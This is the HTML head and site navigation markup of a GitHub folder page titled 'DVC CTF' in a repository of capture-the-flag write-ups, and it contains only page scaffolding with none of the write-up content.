defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3R5+VhOHwJbG+s7VKlj1HjwVKo/RPldgUh98Yed4XMlk1jH7LP20vRYmLUqnvVaZcgx9x9XdWmQWKaBRQfsVvg==" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-dd1e7e56.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-tfzZxJCbul4TLTQmD9EJzuvXoLZGUCnWTiuJCGnXlaABfL2eD0I/J/IL9blT+JbF1dQvKi1g/E7396zAKdrZTA==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-b5fcd9c4.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-CfJc9iAnfLJnxnvSY41oW/N+iuVSia2CCj/v47XVliM9ACQPKur94EPHnokX0RG8e+FPMhJ2CGy9FfqLYZi4Dg==" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-09f25cf6.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Y9QCffkHDk3/KAoYUMhKeokbNlXWgpO+53XrccRwhUWzMTxEmhnp1ce7OVWP3vOzhCfWaxxnKWW9eVjjny8nRA==" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-63d4027d.js"></script> <meta name="viewport" content="width=device-width"> <title>CTF-Writeups/DVC CTF at main · hugoreb/CTF-Writeups · GitHub</title> <meta name="description" content="Contribute to hugoreb/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/9b3af94ca29e27b61aca33a99dd1f4ad3d64d1346017ead7ed2759e023313b3f/hugoreb/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/DVC CTF at main · hugoreb/CTF-Writeups" /><meta name="twitter:description" content="Contribute to hugoreb/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/9b3af94ca29e27b61aca33a99dd1f4ad3d64d1346017ead7ed2759e023313b3f/hugoreb/CTF-Writeups" /><meta property="og:image:alt" content="Contribute to hugoreb/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/DVC CTF at main · hugoreb/CTF-Writeups" /><meta property="og:url" content="https://github.com/hugoreb/CTF-Writeups" /><meta property="og:description" content="Contribute to hugoreb/CTF-Writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <meta name="request-id" content="BBA1:5EA7:12353F6:1356E95:61830784" data-pjax-transient="true"/><meta name="html-safe-nonce" content="31ef57dd57c5560f445e9d8972c7b107a56e37fec3fb1ae4900c03488aea0790" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJCQkExOjVFQTc6MTIzNTNGNjoxMzU2RTk1OjYxODMwNzg0IiwidmlzaXRvcl9pZCI6IjMxMDMxNjI3MTk2NTkwMzQ1MDAiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="7e6f106ffc7b5666dbf64bc4a329f609821a6e94df6d6c4565148ea54931568c" data-pjax-transient="true"/> <meta name="hovercard-subject-tag" content="repository:347718098" data-pjax-transient> <meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" /> <meta name="selected-link" value="repo_source" data-pjax-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" /> <meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-pjax-transient="true" /> <meta name="hostname" content="github.com"> <meta name="user-login" content=""> <meta name="expected-hostname" content="github.com"> <meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION"> <meta http-equiv="x-pjax-version" content="89408a5ac57f5b71ed7ebb466b241a52be13289bf52f5580353d1ab3681a2237"> <meta http-equiv="x-pjax-csp-version" content="9ea82e8060ac9d44365bfa193918b70ed58abd9413362ba412abb161b3a8d1b6"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5"> <meta name="go-import" content="github.com/hugoreb/CTF-Writeups git https://github.com/hugoreb/CTF-Writeups.git"> <meta name="octolytics-dimension-user_id" content="56917045" /><meta name="octolytics-dimension-user_login" content="hugoreb" /><meta name="octolytics-dimension-repository_id" content="347718098" /><meta name="octolytics-dimension-repository_nwo" content="hugoreb/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="347718098" /><meta name="octolytics-dimension-repository_network_root_nwo" content="hugoreb/CTF-Writeups" /> <link rel="canonical" href="https://github.com/hugoreb/CTF-Writeups/tree/main/DVC%20CTF" data-pjax-transient> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" /> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span> <header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> <div class="d-lg-none css-truncate css-truncate-target width-fit p-2"> </div> <div class="d-flex flex-items-center"> Sign up <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg> </button> </div> </div> <div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg> </button> </div> <nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span> Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span> GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span> <h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span> <h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details> Marketplace <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span> Compare plans <span>→</span> Contact Sales <span>→</span> Education <span>→</span> </div> </details> </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0"> <div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="347718098" data-scoped-search-url="/hugoreb/CTF-Writeups/search" data-owner-scoped-search-url="/users/hugoreb/search" data-unscoped-search-url="/search" action="/hugoreb/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="bOk/qo3GGFnV0p33EVIv5d5TA/9s7u250YKH33d6eV14DtwI8Aq5yKyVSoLU1IByeKXFT2uadNHis15l6PL1Ew==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> 